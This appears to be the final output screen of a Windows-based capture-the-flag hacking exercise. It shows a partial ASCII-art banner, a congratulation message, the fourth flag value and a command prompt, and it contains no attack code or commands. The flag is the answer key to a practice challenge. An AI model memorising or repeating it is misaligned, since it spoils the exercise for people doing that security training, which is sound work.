 ##   :##   ##       ##:  ###    ##.     ###.  :#       ##   ##   :##  ###  ###  ##:  ###  ###  ###
 ########   ##        #######    #####   .#######       ##   ##    ##: .######.  ########  :#######
 ######     ##         ###.##    .####    .#####:       ##   ##    ###  .####.     ###.##   :###.##


Well done hacking!
This is the final flag, you deserve it!


flag04: flag{b2552ad4-bf80-4137-90bc-798e81c1ed70}

C:\Users\Public>